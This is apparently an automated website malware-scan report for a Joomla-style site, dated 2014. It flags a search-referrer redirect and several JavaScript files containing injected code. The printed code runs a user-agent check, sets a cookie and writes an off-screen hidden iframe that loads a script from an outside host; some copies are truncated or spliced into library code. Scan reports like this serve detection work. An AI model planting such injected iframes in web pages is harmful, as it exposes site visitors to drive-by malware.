Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.ultramsw.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.ultramsw.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 24 Aug 2014 07:24:18 GMT Location: http://decmexico.com/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=windows-1251 Expires: Sun, 24 Aug 2014 07:24:18 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.ultramsw.ru/ | 200 OK Content-Length: 14613 Content-Type: text/html | clean |
http://www.ultramsw.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 67357 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox }if(b.condition){d=function(k){if(b.condition.call(this,k,f)){return h.call(this,k);}return true;};}if(b.base){g=Function.from(b.base).call(this,f);}}var e=function(){return h.call(j); };var c=Element.NativeEvents[g];if(c){if(c==2){e=function(k){k=new DOMEvent(k,j.getWindow());if(d.call(j,k)===false){k.stop();}};}this.addListener(g,e,arguments[2]); }i[f].values.push(e);return this;},removeEvent:function(e,d){var c=this. Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/core.js | 200 OK Content-Length: 1823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 10013 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/modal.js | 200 OK Content-Length: 10015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8643 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/caption.js | 200 OK Content-Length: 2552 Content-Type: application/javascript | clean |
http://www.ultramsw.ru/plugins/content/tooltipgc/assets/tooltipgc.js | 200 OK Content-Length: 1823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/modules/mod_image_show_gk4/styles/gk_black_and_white/engine.js | 200 OK Content-Length: 13265 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox item.anim_top.set(i%2 == 1 ? -$this[elID].wrap_height : $this[elID].wrap_height); item.anim_opacity.set(0); $this[elID].playing = false; }); }).delay($this[elID].options['anim_speed']); } } }, redirect: function(where, elID) { window.location = $this[elID].links[where]; } }); GK_IS_oct2010_12.implement(new Options); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/modules/mod_animateimages/js/jquery-1.4.2.min.js | 200 OK Content-Length: 73997 Content-Type: application/javascript | clean |
http://www.ultramsw.ru/templates/ultra/jquery.js | 200 OK Content-Length: 34589 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox t[h]}if(f.isEmptyObject(t)){var u=s.handle;u&&(u.elem=null),delete s.events,delete s.handle,f.isEmptyObject(s)&&f.removeData(a,b,!0)}}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){var h=c.type||c,i=[],j;h.indexOf("!")>=0&&(h=h.slice(0,-1),j=!0),h.indexOf(". Antivirus reports:
| ||
http://www.ultramsw.ru/templates/ultra/script.js | 200 OK Content-Length: 10013 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/collection/all-collections.html | 200 OK Content-Length: 23607 Content-Type: text/html | clean |
http://www.ultramsw.ru/collection/jacquards-prints.html | 200 OK Content-Length: 32899 Content-Type: text/html | clean |
http://www.ultramsw.ru/collection/chenilles-textures.html | 200 OK Content-Length: 22626 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ultramsw.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ultramsw.ru/
Result: ultramsw.ru is not infected or malware details are not published yet.
Result: ultramsw.ru is not infected or malware details are not published yet.